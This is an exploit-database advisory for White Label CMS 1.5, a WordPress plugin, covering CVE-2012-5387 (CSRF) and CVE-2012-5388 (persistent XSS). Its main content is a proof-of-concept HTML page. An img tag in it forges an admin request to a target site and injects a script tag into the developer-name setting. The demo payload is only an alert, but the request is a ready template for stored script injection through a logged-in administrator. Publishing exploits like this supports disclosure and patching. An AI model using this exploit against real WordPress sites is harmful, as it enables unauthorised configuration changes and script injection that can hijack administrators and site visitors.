White Label CMS 1.5 CSRF & persistent XSS

2012.10.23
Credit: pcsjj
Risk: Low
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS # Date: 21/10/2012 # Exploit Author: pcsjj # Vendor Homepage: http://www.videousermanuals.com/white-label-cms/ # Version: 1.5 # Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/ # Downloads: 110,313 # CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS) <html> <title>White Label CMS CSRF</title> <body> <img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div "'> </body> </html>

References:

http://www.videousermanuals.com/white-label-cms/
http://plugins.svn.wordpress.org/white-label-cms/branches/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top